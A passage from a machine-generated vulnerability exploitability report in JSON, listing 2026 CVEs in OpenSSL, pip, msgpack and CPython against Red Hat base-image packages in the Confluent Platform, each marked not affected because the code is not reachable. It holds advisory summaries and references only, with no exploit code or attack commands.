          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/openssl@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-28389",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        476
      ],
      "description": "Issue summary: During processing of a crafted CMS EnvelopedData message\nwith KeyAgreeRecipientInfo a NULL pointer dereference can happen.\n\nImpact summary: Applications that process attacker-controlled CMS data may\ncrash before authentication or cryptographic operations occur resulting in\nDenial of Service.\n\nWhen a CMS EnvelopedData message that uses KeyAgreeRecipientInfo is\nprocessed, the optional parameters field of KeyEncryptionAlgorithmIdentifier\nis examined without checking for its presence. This results in a NULL\npointer dereference if the field is missing.\n\nApplications and services that call CMS_decrypt() on untrusted input\n(e.g., S/MIME processing or CMS-based protocols) are vulnerable.\n\nThe FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this\nissue, as the affected code is outside the OpenSSL FIPS module boundary.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-28389"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-28389"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-032379.html"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-265688.html"
        },
        {
          "url": "https://github.com/advisories/GHSA-7x88-9hgc-69gf"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/16cea4188e0ea567deb4f93f85902247e67384f5"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/785cbf7ea3b5a6f5adf0c1ccb92b79d89c35c616"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/7b5274e812400cacb6f3be4c2df5340923fa807f"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/c6725634e089eb2b634b10ede33944be7248172a"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/f80f83bc5fd036bc47d773e8b15a001e2b4ce686"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28389"
        },
        {
          "url": "https://openssl-library.org/news/secadv/20260407.txt"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8155-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8155-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-28389"
        },
        {
          "url": "https://www.openwall.com/lists/oss-security/2026/04/07/11"
        }
      ],
      "published": "2026-04-07T22:16:21+00:00",
      "updated": "2026-07-24T23:10:00+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1",
          "versions": [
            {
              "version": "1:3.5.5-6.el9_8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/openssl@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1",
          "versions": [
            {
              "version": "1:3.5.5-6.el9_8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/openssl@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/openssl@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/openssl@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-31789",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 9.8,
          "severity": "critical",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 9.8,
          "severity": "critical",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "critical"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.8,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        787
      ],
      "description": "Issue summary: Converting an excessively large OCTET STRING value to\na hexadecimal string leads to a heap buffer overflow on 32 bit platforms.\n\nImpact summary: A heap buffer overflow may lead to a crash or possibly\nan attacker controlled code execution or other undefined behavior.\n\nIf an attacker can supply a crafted X.509 certificate with an excessively\nlarge OCTET STRING value in extensions such as the Subject Key Identifier\n(SKID) or Authority Key Identifier (AKID) which are being converted to hex,\nthe size of the buffer needed for the result is calculated as multiplication\nof the input length by 3. On 32 bit platforms, this multiplication may overflow\nresulting in the allocation of a smaller buffer and a heap buffer overflow.\n\nApplications and services that print or log contents of untrusted X.509\ncertificates are vulnerable to this issue. As the certificates would have\nto have sizes of over 1 Gigabyte, printing or logging such certificates\nis a fairly unlikely operation and only 32 bit platforms are affected,\nthis issue was assigned Low severity.\n\nThe FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this\nissue, as the affected code is outside the OpenSSL FIPS module boundary.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-31789"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-31789"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-032379.html"
        },
        {
          "url": "https://github.com/advisories/GHSA-j79m-9jxq-788r"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/364f095b80601db632b0def6a33316967f863bde"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/7a9087efd769f362ad9c0e30c7baaa6bbfa65ecf"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/945b935ac66cc7f1a41f1b849c7c25adb5351f49"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/a24216018e1ede8ff01a4ff5afff7dfbd443e2f9"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/a91e537d16d74050dbde50bb0dfb1fe9930f0521"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-31789"
        },
        {
          "url": "https://openssl-library.org/news/secadv/20260407.txt"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8155-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-31789"
        },
        {
          "url": "https://www.openwall.com/lists/oss-security/2026/04/07/11"
        }
      ],
      "published": "2026-04-07T22:16:21+00:00",
      "updated": "2026-07-24T23:10:00+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1",
          "versions": [
            {
              "version": "1:3.5.5-6.el9_8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/openssl@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1",
          "versions": [
            {
              "version": "1:3.5.5-6.el9_8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/openssl@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/openssl@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/openssl@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-3219",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
      },
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N"
        }
      ],
      "cwes": [
        434
      ],
      "description": "pip handles concatenated tar and ZIP files as ZIP files regardless of filename or whether a file is both a tar and ZIP file. This behavior could result in confusing installation behavior, such as installing \"incorrect\" files according to the filename of the archive. New behavior only proceeds with installation if the file identifies uniquely as a ZIP or tar archive, not as both.",
      "recommendation": "Upgrade pip to version 26.1",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-3219"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/04/20/8"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-3219"
        },
        {
          "url": "https://github.com/pypa/pip"
        },
        {
          "url": "https://github.com/pypa/pip/issues/13867"
        },
        {
          "url": "https://github.com/pypa/pip/pull/13870"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/QAJ5JIVWWCAJ4EZL2FP5MOOW35JS7LRJ"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/QAJ5JIVWWCAJ4EZL2FP5MOOW35JS7LRJ/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3219"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-3219"
        }
      ],
      "published": "2026-04-20T16:16:45+00:00",
      "updated": "2026-06-17T10:43:14+00:00",
      "affects": [
        {
          "ref": "pkg:pypi/pip@26.0.1",
          "versions": [
            {
              "version": "26.0.1",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:pypi/pip@26.0.1"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-32284",
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        125
      ],
      "description": "The msgpack decoder fails to properly validate the input buffer length when processing truncated fixext data (format codes 0xd4-0xd8). This can lead to an out-of-bounds read and a runtime panic, allowing a denial of service attack.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-32284"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-32284"
        },
        {
          "url": "https://github.com/golang/vulndb/issues/4513"
        },
        {
          "url": "https://github.com/shamaton/msgpack"
        },
        {
          "url": "https://github.com/shamaton/msgpack/issues/59"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32284"
        },
        {
          "url": "https://pkg.go.dev/vuln/GO-2026-4513"
        },
        {
          "url": "https://securityinfinity.com/research/shamaton-msgpack-oob-panic-fixext-dos-2026"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-32284"
        }
      ],
      "published": "2026-03-26T20:16:12+00:00",
      "updated": "2026-06-17T10:35:29+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8",
          "versions": [
            {
              "version": "21.3.1-2.el9_8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-3276",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        407
      ],
      "description": "unicodedata.normalize() can take excessive CPU time when processing\nspecially crafted Unicode input containing long runs of combining characters\nwith alternating Canonical Combining Class values.\nThis affects all normalization forms.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-3276"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/06/03/15"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-3276"
        },
        {
          "url": "https://github.com/python/cpython/commit/6b505d1f41f8f3ea0fe5a4786d3a8fff1875cfc0"
        },
        {
          "url": "https://github.com/python/cpython/commit/90748760d38ca3ac5fc6788a69becab905c95598"
        },
        {
          "url": "https://github.com/python/cpython/commit/991224b1e8311c85f198f6dd8208bf8cff7fc26f"
        },
        {
          "url": "https://github.com/python/cpython/commit/ba785b88add96acbf403d65cb157fb2743a33a32"
        },
        {
          "url": "https://github.com/python/cpython/commit/c5512bd7c1dc28055660565275012766941d3066"
        },
        {
          "url": "https://github.com/python/cpython/commit/d3ab945af25b28dfe13ac6cb40c124a01b33ce1f"
        },
        {
          "url": "https://github.com/python/cpython/commit/db744c0776c1d5dd11aaa70eff2a6993c408bacc"
        },
        {
          "url": "https://github.com/python/cpython/commit/e322a1857084d521f79f45181b776f62e6acfc2c"
        },
        {
          "url": "https://github.com/python/cpython/issues/149079"
        },
        {
          "url": "https://github.com/python/cpython/pull/149080"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/PP5HB4K7727OBBM76KA2ILID76K3OZGZ/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3276"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8509-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-3276"
        },
        {
          "url": "https://www.openwall.com/lists/oss-security/2026/06/03/15"
        }
      ],
      "published": "2026-06-03T16:16:29+00:00",
      "updated": "2026-08-13T01:16:52+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
